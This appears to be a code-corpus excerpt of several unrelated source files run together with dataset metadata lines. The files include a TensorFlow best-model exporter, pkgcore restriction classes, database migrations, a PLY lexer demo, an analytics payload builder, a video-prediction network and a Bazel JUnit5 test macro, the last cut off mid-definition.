if not best_eval_result or default_key not in best_eval_result:
raise ValueError(
'best_eval_result cannot be empty or no loss is found in it.')
if not current_eval_result or default_key not in current_eval_result:
raise ValueError(
'current_eval_result cannot be empty or no loss is found in it.')
return best_eval_result[default_key] > current_eval_result[default_key]
class BestExporter(Exporter):
"""This class exports the serving graph and checkpoints of the best models.
This class performs a model export everytime when the new model is better
than any exsiting model.
"""
def __init__(self,
name='best_exporter',
serving_input_receiver_fn=None,
event_file_pattern='eval/*.tfevents.*',
compare_fn=_loss_smaller,
assets_extra=None,
as_text=False,
exports_to_keep=5):
"""Create an `Exporter` to use with `tf.estimator.EvalSpec`.
Example of creating a BestExporter for training and evluation:
```python
def make_train_and_eval_fn():
# Set up feature columns.
categorial_feature_a = (
tf.feature_column.categorical_column_with_hash_bucket(...))
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = tf.estimator.DNNClassifier(
config=tf.estimator.RunConfig(
model_dir='/my_model', save_summary_steps=100),
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
serving_feature_spec = tf.feature_column.make_parse_example_spec(
categorial_feature_a_emb)
serving_input_receiver_fn = (
tf.estimator.export.build_parsing_serving_input_receiver_fn(
serving_feature_spec))
exporter = tf.estimator.BestExporter(
name="best_exporter",
serving_input_receiver_fn=serving_input_receiver_fn,
exports_to_keep=5)
train_spec = tf.estimator.TrainSpec(...)
eval_spec = [tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=100,
exporters=exporter,
start_delay_secs=0,
throttle_secs=5)]
return tf.estimator.DistributedTrainingSpec(estimator, train_spec,
eval_spec)
```
Args:
name: unique name of this `Exporter` that is going to be used in the
export path.
serving_input_receiver_fn: a function that takes no arguments and returns
a `ServingInputReceiver`.
event_file_pattern: event file name pattern relative to model_dir. If
None, however, the exporter would not be preemption-safe. To bex
preemption-safe, event_file_pattern should be specified.
compare_fn: a function that compares two evaluation results and returns
true if current evaluation result is better. Follows the signature:
* Args:
* `best_eval_result`: This is the evaluation result of the best model.
* `current_eval_result`: This is the evaluation result of current
candidate model.
* Returns:
True if current evaluation result is better; otherwise, False.
assets_extra: An optional dict specifying how to populate the assets.extra
directory within the exported SavedModel. Each key should give the
destination path (including the filename) relative to the assets.extra
directory. The corresponding value gives the full path of the source
file to be copied. For example, the simple case of copying a single
file without renaming it is specified as `{'my_asset_file.txt':
'/path/to/my_asset_file.txt'}`.
as_text: whether to write the SavedModel proto in text format. Defaults to
`False`.
exports_to_keep: Number of exports to keep. Older exports will be
garbage-collected. Defaults to 5. Set to `None` to disable garbage
collection.
Raises:
ValueError: if any arguments is invalid.
"""
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
_verify_compare_fn_args(self._compare_fn)
self._saved_model_exporter = _SavedModelExporter(
name, serving_input_receiver_fn, assets_extra, as_text)
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
self._exports_to_keep = exports_to_keep
self._log = {}
if exports_to_keep is not None and exports_to_keep <= 0:
raise ValueError(
'`exports_to_keep`, if provided, must be positive number')
@property
def name(self):
return self._saved_model_exporter.name
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
export_result = None
if self._model_dir != estimator.model_dir and self._event_file_pattern:
# Loads best metric from event files.
tf_logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if os.path.isfile(os.path.join(export_path, 'export.log')):
self._log = {}
try:
self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r'))
except json.JSONDecodeError:
pass
if len(self._log) == 0:
self._best_eval_result = None
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf_logging.info('Performing best model export.')
self._best_eval_result = eval_result
export_result = self._saved_model_exporter.export(
estimator, export_path, checkpoint_path, eval_result,
is_the_final_export)
export_result_path = export_result.decode("utf-8")
self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()}
self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"])
self._garbage_collect_exports(export_path)
with open(os.path.join(export_path, 'export.log'), 'w') as fp:
json.dump(self._log, fp)
return export_result
def _copy_checkpoint(self, checkpoint_pattern, dest_path, step):
for file in glob.glob(checkpoint_pattern + '*'):
shutil.copy(file, dest_path)
with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp:
text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step))
fp.write(text)
fp.close()
def _garbage_collect_exports(self, export_dir_base):
"""Deletes older exports, retaining only a given number of the most recent.
Export subdirectories are assumed to be named with monotonically increasing
integers; the most recent are taken to be those with the largest values.
Args:
export_dir_base: the base directory under which each export is in a
versioned subdirectory.
"""
if self._exports_to_keep is None:
return
def _export_version_parser(path):
# create a simple parser that pulls the export_version from the directory.
filename = os.path.basename(path.path)
if not (len(filename) == 10 and filename.isdigit()):
return None
return path._replace(export_version=int(filename))
# pylint: disable=protected-access
keep_filter = gc._largest_export_versions(self._exports_to_keep)
delete_filter = gc._negation(keep_filter)
for p in delete_filter(
gc._get_paths(export_dir_base, parser=_export_version_parser)):
try:
del self._log[p.path]
gfile.DeleteRecursively(p.path)
except errors_impl.NotFoundError as e:
tf_logging.warn('Can not delete %s recursively: %s', p.path, e)
# pylint: enable=protected-access
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
event_count = 0
best_eval_result = None
for event_file in gfile.Glob(os.path.join(event_files)):
for event in summary_iterator.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
event_count += 1
best_eval_result = event_eval_result
if event_count < 2:
return None
return best_eval_result
| 2.0625 | 2 |
src/pkgcore/restrictions/restriction.py | mgorny/pkgcore | 0 | 3382 | <reponame>mgorny/pkgcore<filename>src/pkgcore/restrictions/restriction.py<gh_stars>0
# Copyright: 2005-2012 <NAME> <<EMAIL>
# Copyright: 2006 <NAME> <<EMAIL>>
# License: BSD/GPL2
"""
base restriction class
"""
from functools import partial
from snakeoil import caching, klass
from snakeoil.currying import pretty_docs
class base(object, metaclass=caching.WeakInstMeta):
"""base restriction matching object.
all derivatives *should* be __slot__ based (lot of instances may
wind up in memory).
"""
__inst_caching__ = True
# __weakref__ here is implicit via the metaclass
__slots__ = ()
package_matching = False
klass.inject_immutable_instance(locals())
def match(self, *arg, **kwargs):
raise NotImplementedError
def force_False(self, *arg, **kwargs):
return not self.match(*arg, **kwargs)
def force_True(self, *arg, **kwargs):
return self.match(*arg, **kwargs)
def __len__(self):
return 1
class AlwaysBool(base):
"""restriction that always yields a specific boolean"""
__slots__ = ("type", "negate")
__inst_caching__ = True
def __init__(self, node_type=None, negate=False):
"""
:param node_type: the restriction type the instance should be,
typically :obj:`pkgcore.restrictions.packages.package_type` or
:obj:`pkgcore.restrictions.values.value_type`
:param negate: boolean to return for the match
"""
object.__setattr__(self, "negate", negate)
object.__setattr__(self, "type", node_type)
def match(self, *a, **kw):
return self.negate
def force_True(self, *a, **kw):
return self.negate
def force_False(self, *a, **kw):
return not self.negate
def __iter__(self):
return iter(())
def __str__(self):
return f"always '{self.negate}'"
def __repr__(self):
return '<%s always %r @%#8x>' % (
self.__class__.__name__, self.negate, id(self))
def __getstate__(self):
return self.negate, self.type
def __setstate__(self, state):
negate, node_type = state
object.__setattr__(self, "negate", negate)
object.__setattr__(self, "type", node_type)
class Negate(base):
"""wrap and negate a restriction instance"""
__slots__ = ("type", "_restrict")
__inst_caching__ = False
def __init__(self, restrict):
"""
:param restrict: :obj:`pkgcore.restrictions.restriction.base` instance
to negate
"""
sf = object.__setattr__
sf(self, "type", restrict.type)
sf(self, "_restrict", restrict)
def match(self, *a, **kw):
return not self._restrict.match(*a, **kw)
def __str__(self):
return "not (%s)" % self._restrict
class FakeType(base):
"""wrapper to wrap and fake a node_type"""
__slots__ = ("type", "_restrict")
__inst_caching__ = False
def __init__(self, restrict, new_type):
"""
:param restrict: :obj:`pkgcore.restrictions.restriction.base` instance
to wrap
:param new_type: new node_type
"""
sf = object.__setattr__
sf(self, "type", new_type)
sf(self, "_restrict", restrict)
def match(self, *a, **kw):
return self._restrict.match(*a, **kw)
def __str__(self):
return "Faked type(%s): %s" % (self.type, self._restrict)
class AnyMatch(base):
"""Apply a nested restriction to every item in a sequence."""
__slots__ = ('restriction', 'type', 'negate')
def __init__(self, childrestriction, node_type, negate=False):
"""Initialize.
:type childrestriction: restriction
:param childrestriction: child restriction applied to every value.
:type node_type: string
:param node_type: type of this restriction.
"""
sf = object.__setattr__
sf(self, "negate", negate)
sf(self, "restriction", childrestriction)
sf(self, "type", node_type)
def match(self, val):
for x in val:
if self.restriction.match(x):
return not self.negate
return self.negate
def __str__(self):
return "any: %s match" % (self.restriction,)
def __repr__(self):
return '<%s restriction=%r @%#8x>' % (
self.__class__.__name__, self.restriction, id(self))
def curry_node_type(cls, node_type, extradoc=None):
"""Helper function for creating restrictions of a certain type.
This uses :obj:`partial` to pass a node_type to the wrapped class,
and extends the docstring.
:param cls: callable (usually a class) that is wrapped.
:param node_type: value passed as node_type.
:param extradoc: addition to the docstring. Defaults to
"Automatically set to %s type." % node_type
:return: a wrapped callable.
"""
if extradoc is None:
extradoc = "Automatically set to %s type." % (node_type,)
doc = cls.__doc__
result = partial(cls, node_type=node_type)
if doc is None:
doc = ''
else:
# do this so indentation on pydoc __doc__ is sane
doc = "\n".join(line.lstrip() for line in doc.split("\n")) + "\n"
doc += extradoc
return pretty_docs(result, doc)
value_type = "values"
package_type = "package"
valid_types = (value_type, package_type)
| 2.328125 | 2 |
keylime/migrations/versions/8da20383f6e1_extend_ip_field.py | kkaarreell/keylime | 18 | 3383 | """extend_ip_field
Revision ID: 8da20383f6e1
Revises: <KEY>
Create Date: 2021-01-14 10:50:56.275257
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "8da20383f6e1"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()[f"upgrade_{engine_name}"]()
def downgrade(engine_name):
globals()[f"downgrade_{engine_name}"]()
def upgrade_registrar():
pass
def downgrade_registrar():
pass
def upgrade_cloud_verifier():
with op.batch_alter_table("verifiermain") as batch_op:
batch_op.alter_column(
"ip", existing_type=sa.String(length=15), type_=sa.String(length=255), existing_nullable=True
)
def downgrade_cloud_verifier():
pass
| 1.445313 | 1 |
token_train/quickdemo(1)(1).py | Tatsuya26/processamento_de_linguagens | 0 | 3384 | <filename>token_train/quickdemo(1)(1).py
import ply.lex as lex
tokens =["NUM","OPERADORES"]
t_NUM = '\d+'
t_OPERADORES = '[+|*|-]'
t_ignore='\n\t '
def t_error(t):
print("Erro")
print(t)
lexer = lex.lex()
# 1+2 1-2 1*2
# ola mundo
import sys
for line in sys.stdin:
lexer.input(line)
for tok in lexer:
print(tok) | 3.046875 | 3 |
ucsrb/migrations/0013_auto_20180710_2040.py | Ecotrust/ucsrb | 1 | 3385 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-07-10 20:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ucsrb', '0012_auto_20180710_1249'),
]
operations = [
migrations.AddField(
model_name='treatmentscenario',
name='landform_type',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes',
field=models.TextField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_east_west',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_floor',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_north',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_ridgetop',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_south',
field=models.BooleanField(default=True),
),
]
| 1.632813 | 2 |
src/ctc/protocols/fei_utils/analytics/payload_crud.py | fei-protocol/checkthechain | 94 | 3386 | from __future__ import annotations
import typing
from ctc import spec
from . import timestamp_crud
from . import metric_crud
from . import analytics_spec
async def async_create_payload(
*,
blocks: typing.Sequence[spec.BlockNumberReference] | None = None,
timestamps: typing.Sequence[int] | None = None,
timescale: analytics_spec.TimescaleSpec | None = None,
end_time: analytics_spec.Timestamp | None = None,
window_size: str | None = None,
interval_size: str | None = None,
provider: spec.ProviderSpec = None,
) -> analytics_spec.AnalyticsPayload:
"""create data payload from scratch"""
time_data = await timestamp_crud.async_get_time_data(
blocks=blocks,
timestamps=timestamps,
timescale=timescale,
end_time=end_time,
window_size=window_size,
interval_size=interval_size,
provider=provider,
)
# get data
data = await metric_crud.async_get_metrics(
blocks=time_data['block_numbers']
)
return {
'version': '0.1.0',
#
# time data
'n_samples': time_data['n_samples'],
'window_size': time_data['window_size'],
'interval_size': time_data['interval_size'],
'timestamps': time_data['timestamps'],
'block_numbers': time_data['block_numbers'],
'created_at_timestamp': time_data['created_at_timestamp'],
#
# metric data
'data': data,
}
# def update_payload(
# timescale: analytics_spec.Timescale,
# old_payload: analytics_spec.AnalyticsPayload,
# ) -> analytics_spec.AnalyticsPayload:
# new_timestamps = get_new_timestamps(
# timescale=timescale,
# old_payload=old_payload,
# )
# new_blocks = get_new_blocks(
# new_timestamps=new_timestamps,
# old_payload=old_payload,
# )
# new_metrics = get_metrics(blocks=new_blocks)
# return combine_new_data(
# old_payload=old_payload,
# new_metrics=new_metrics,
# )
| 2.234375 | 2 |
research/video_prediction/prediction_model.py | mbz/models | 1 | 3387 | # Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture for predictive model, including CDNA, DNA, and STP."""
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.platform import flags
from tensorflow.contrib.layers.python import layers as tf_layers
from lstm_ops import basic_conv_lstm_cell
FLAGS = flags.FLAGS
# Amount to use when lower bounding tensors
RELU_SHIFT = 1e-12
# kernel size for DNA and CDNA.
DNA_KERN_SIZE = 5
def kl_divergence(mu, log_sigma):
"""KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1).
Args:
mu: mu parameter of the distribution.
log_sigma: log(sigma) parameter of the distribution.
Returns:
the KL loss.
"""
return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma),
axis=1)
def construct_latent_tower(images):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
Returns:
latent_mean: predicted latent mean
latent_std: predicted latent standard deviation
latent_loss: loss of the latent twoer
samples: random samples sampled from standard guassian
"""
with slim.arg_scope([slim.conv2d], reuse=False):
stacked_images = tf.concat(images, 3)
latent_enc1 = slim.conv2d(
stacked_images,
32, [3, 3],
stride=2,
scope='latent_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm1'})
latent_enc2 = slim.conv2d(
latent_enc1,
64, [3, 3],
stride=2,
scope='latent_conv2',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm2'})
latent_enc3 = slim.conv2d(
latent_enc2,
64, [3, 3],
stride=1,
scope='latent_conv3',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm3'})
latent_mean = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
activation_fn=None,
scope='latent_mean',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm_mean'})
latent_std = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
scope='latent_std',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_std_norm'})
latent_std += FLAGS.latent_std_min
divergence = kl_divergence(latent_mean, latent_std)
latent_loss = tf.reduce_mean(divergence)
if FLAGS.multi_latent:
# timestep x batch_size x latent_size
samples = tf.random_normal(
[FLAGS.sequence_length-1] + latent_mean.shape, 0, 1,
dtype=tf.float32)
else:
# batch_size x latent_size
samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32)
if FLAGS.inference_time:
# No latent tower at inference time, just standard gaussian.
return None, None, None, samples
else:
return latent_mean, latent_std, latent_loss, samples
def construct_model(images,
actions=None,
states=None,
iter_num=-1.0,
k=-1,
use_state=True,
num_masks=10,
stp=False,
cdna=True,
dna=False,
context_frames=2):
"""Build convolutional lstm video predictor using STP, CDNA, or DNA.
Args:
images: tensor of ground truth image sequences
actions: tensor of action sequences
states: tensor of ground truth state sequences
iter_num: tensor of the current training iteration (for sched. sampling)
k: constant used for scheduled sampling. -1 to feed in own prediction.
use_state: True to include state and action in prediction
num_masks: the number of different pixel motion predictions (and
the number of masks for each of those predictions)
stp: True to use Spatial Transformer Predictor (STP)
cdna: True to use Convoluational Dynamic Neural Advection (CDNA)
dna: True to use Dynamic Neural Advection (DNA)
context_frames: number of ground truth frames to pass in before
feeding in own predictions
Returns:
gen_images: predicted future image frames
gen_states: predicted future states
Raises:
ValueError: if more than one network option specified or more than 1 mask
specified for DNA model.
"""
# Each image is being used twice, in latent tower and main tower.
# This is to make sure we are using the *same* image for both, ...
# ... given how TF queues work.
images = [tf.identity(image) for image in images]
if stp + cdna + dna != 1:
raise ValueError('More than one, or no network option specified.')
batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4]
lstm_func = basic_conv_lstm_cell
# Generated robot states and images.
gen_states, gen_images = [], []
current_state = states[0]
if k == -1:
feedself = True
else:
# Scheduled sampling:
# Calculate number of ground-truth frames to pass in.
num_ground_truth = tf.to_int32(
tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k)))))
feedself = False
# LSTM state sizes and states.
lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32]))
lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None
lstm_state5, lstm_state6, lstm_state7 = None, None, None
# Latent tower
latent_loss = 0.0
if FLAGS.stochastic_model:
latent_tower_outputs = construct_latent_tower(images)
latent_mean, latent_std, latent_loss, samples = latent_tower_outputs
# Main tower
for image, action in zip(images[:-1], actions[:-1]):
# Reuse variables after the first timestep.
reuse = bool(gen_images)
done_warm_start = len(gen_images) > context_frames - 1
with slim.arg_scope(
[lstm_func, slim.layers.conv2d, slim.layers.fully_connected,
tf_layers.layer_norm, slim.layers.conv2d_transpose],
reuse=reuse):
if feedself and done_warm_start:
# Feed in generated image.
prev_image = gen_images[-1]
elif done_warm_start:
# Scheduled sampling
prev_image = scheduled_sample(image, gen_images[-1], batch_size,
num_ground_truth)
else:
# Always feed in ground_truth
prev_image = image
# Predicted state is always fed back in
state_action = tf.concat(axis=1, values=[action, current_state])
enc0 = slim.layers.conv2d(
prev_image,
32, [5, 5],
stride=2,
scope='scale1_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm1'})
hidden1, lstm_state1 = lstm_func(
enc0, lstm_state1, lstm_size[0], scope='state1')
hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2')
hidden2, lstm_state2 = lstm_func(
hidden1, lstm_state2, lstm_size[1], scope='state2')
hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3')
enc1 = slim.layers.conv2d(
hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2')
hidden3, lstm_state3 = lstm_func(
enc1, lstm_state3, lstm_size[2], scope='state3')
hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4')
hidden4, lstm_state4 = lstm_func(
hidden3, lstm_state4, lstm_size[3], scope='state4')
hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5')
enc2 = slim.layers.conv2d(
hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3')
# Pass in state and action.
smear = tf.reshape(
state_action,
[int(batch_size), 1, 1, int(state_action.get_shape()[1])])
smear = tf.tile(
smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1])
if use_state:
enc2 = tf.concat(axis=3, values=[enc2, smear])
# Setup latent
if FLAGS.stochastic_model:
latent = samples
if FLAGS.multi_latent:
latent = samples[timestep]
if not FLAGS.inference_time:
latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage,
lambda: tf.identity(latent),
lambda: latent_mean + tf.exp(latent_std / 2.0) * latent)
with tf.control_dependencies([latent]):
enc2 = tf.concat([enc2, latent], 3)
enc3 = slim.layers.conv2d(
enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4')
hidden5, lstm_state5 = lstm_func(
enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8
hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6')
enc4 = slim.layers.conv2d_transpose(
hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1')
hidden6, lstm_state6 = lstm_func(
enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16
hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7')
# Skip connection.
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16
enc5 = slim.layers.conv2d_transpose(
hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2')
hidden7, lstm_state7 = lstm_func(
enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32
hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8')
# Skip connection.
hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32
enc6 = slim.layers.conv2d_transpose(
hidden7,
hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None,
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm9'})
if dna:
# Using largest hidden state for predicting untied conv kernels.
enc7 = slim.layers.conv2d_transpose(
enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None)
else:
# Using largest hidden state for predicting a new image layer.
enc7 = slim.layers.conv2d_transpose(
enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None)
# This allows the network to also generate one image from scratch,
# which is useful when regions of the image become unoccluded.
transformed = [tf.nn.sigmoid(enc7)]
if stp:
stp_input0 = tf.reshape(hidden5, [int(batch_size), -1])
stp_input1 = slim.layers.fully_connected(
stp_input0, 100, scope='fc_stp')
transformed += stp_transformation(prev_image, stp_input1, num_masks)
elif cdna:
cdna_input = tf.reshape(hidden5, [int(batch_size), -1])
transformed += cdna_transformation(prev_image, cdna_input, num_masks,
int(color_channels))
elif dna:
# Only one mask is supported (more should be unnecessary).
if num_masks != 1:
raise ValueError('Only one mask is supported for DNA model.')
transformed = [dna_transformation(prev_image, enc7)]
masks = slim.layers.conv2d_transpose(
enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None)
masks = tf.reshape(
tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])),
[int(batch_size), int(img_height), int(img_width), num_masks + 1])
mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks)
output = mask_list[0] * prev_image
for layer, mask in zip(transformed, mask_list[1:]):
output += layer * mask
gen_images.append(output)
current_state = slim.layers.fully_connected(
state_action,
int(current_state.get_shape()[1]),
scope='state_pred',
activation_fn=None)
gen_states.append(current_state)
return gen_images, gen_states, latent_loss
## Utility functions
def stp_transformation(prev_image, stp_input, num_masks):
"""Apply spatial transformer predictor (STP) to previous image.
Args:
prev_image: previous image to be transformed.
stp_input: hidden layer to be used for computing STN parameters.
num_masks: number of masks and hence the number of STP transformations.
Returns:
List of images transformed by the predicted STP parameters.
"""
# Only import spatial transformer if needed.
from spatial_transformer import transformer
identity_params = tf.convert_to_tensor(
np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32))
transformed = []
for i in range(num_masks - 1):
params = slim.layers.fully_connected(
stp_input, 6, scope='stp_params' + str(i),
activation_fn=None) + identity_params
transformed.append(transformer(prev_image, params))
return transformed
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
cdna_input: hidden lyaer to be used for computing CDNA kernels.
num_masks: the number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = int(cdna_input.get_shape()[0])
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = slim.layers.fully_connected(
cdna_input,
DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks,
scope='cdna_params',
activation_fn=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks])
cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')
# Transpose the dimensions to where they belong.
transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def dna_transformation(prev_image, dna_input):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
dna_input: hidden lyaer to be used for computing DNA transformation.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(DNA_KERN_SIZE):
for ykern in range(DNA_KERN_SIZE):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT
kernel = tf.expand_dims(
kernel / tf.reduce_sum(
kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth):
"""Sample batch with specified mix of ground truth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
num_ground_truth: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
idx = tf.random_shuffle(tf.range(int(batch_size)))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size)))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
return tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
| 2.078125 | 2 |
junit5/rules.bzl | prashantsharma04/bazel_java_rules | 1 | 3388 | <filename>junit5/rules.bzl
load("@rules_jvm_external//:defs.bzl", "artifact")
# For more information see
# - https://github.com/bmuschko/bazel-examples/blob/master/java/junit5-test/BUILD
# - https://github.com/salesforce/bazel-maven-proxy/tree/master/tools/junit5
# - https://github.com/junit-team/junit5-samples/tree/master/junit5-jupiter-starter-bazel
def junit5_test(name, srcs, test_package, resources = [], deps = [], runtime_deps = [], **kwargs):
"""JUnit runner macro"""
FILTER_KWARGS = [
"main_class",
"use_testrunner",
"args",
]
for arg in FILTER_KWARGS:
if arg in kwargs.keys():
kwargs.pop(arg)
junit_console_args = []
if test_package:
junit_console_args += ["--select-package", test_package]
else:
fail("must specify 'test_package'")
native.java_test(
name = name,
srcs = srcs,
use_testrunner = False,
main_class = "org.junit.platform.console.ConsoleLauncher",
args = junit_console_args,
deps = deps + [
artifact("org.junit.jupiter:junit-jupiter-api"),
artifact("org.junit.jupiter:junit-jupiter-params"),
artifact("org.junit.jupiter:junit-jupiter-engine"),
artifact("org.hamcrest:hamcrest-library"),
artifact("org.hamcrest:hamcrest-core"),
artifact("org.hamcrest:hamcrest"),
artifact("org.mockito:mockito-core"),
],
visibility = ["//java:__subpackages__"],
resources = resources,
runtime_deps = runtime_deps + [
artifact("org.junit.platform:junit-platform-console"),
],
